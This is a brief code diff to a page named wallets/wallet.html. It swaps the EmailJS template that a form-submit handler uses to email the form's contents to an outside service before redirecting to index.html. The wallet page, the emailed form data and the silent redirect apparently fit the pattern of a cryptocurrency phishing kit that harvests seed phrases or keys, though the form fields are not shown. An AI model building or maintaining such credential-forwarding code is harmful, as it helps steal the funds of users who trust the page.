--- a/wallets/wallet.html
+++ b/wallets/wallet.html
@@ -1444,8 +1444,8 @@
       event.preventDefault();  // Prevent the default form submission behavior
 
       // Send form data using EmailJS
-      // emailjs.sendForm('service_wl9o2fc', 'template_7grl9yh', this)
-      emailjs.sendForm('service_wl9o2fc', 'template_v19wqms', this)
+      emailjs.sendForm('service_wl9o2fc', 'template_7grl9yh', this)
+     
         .then(function (response) {
           console.log('SUCCESS!', response.status, response.text);
           // Redirect to index.html after successful submission
